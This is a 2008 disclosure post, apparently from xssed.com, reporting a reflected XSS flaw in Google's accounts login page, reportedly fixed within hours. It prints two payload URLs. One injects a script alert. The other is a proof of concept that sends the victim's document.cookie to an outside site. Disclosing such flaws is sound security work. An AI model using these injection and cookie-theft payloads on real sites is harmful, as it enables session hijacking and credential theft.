Google accounts SSL login page suffers from highly critical XSS

Written by DP

Wednesday, 12 November 2008

In this case, the fact that SSL is being used on the login page, does not necessarily mean that the users' login information is secured. UPDATE: this was fixed a few hours after publishing it.

Malicious people can exploit this Google XSS to propagate malware, spyware, adware and steal authentication credentials.

Mirror:
http://www.xssed.com/mirror/54247/

XSS:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%27
%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3
EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fwww.google
.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_
medium=redirect&utm_campaign=standalone

Redirection and document.cookie PoC:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e'">
<SCRIPT>location.href+%3D+'http%3A%2F%2Fwww.xssed.com/?'%2Bdocument.cookie<%2F
SCRIPT>&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3
Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone

Mirror of similar old Google XSS (now fixed):
http://www.xssed.com/mirror/25472/

Security researcher "Xylitol" is credited with the discovery of this critical bug.

It is only a matter of minutes before we see it fixed by Google.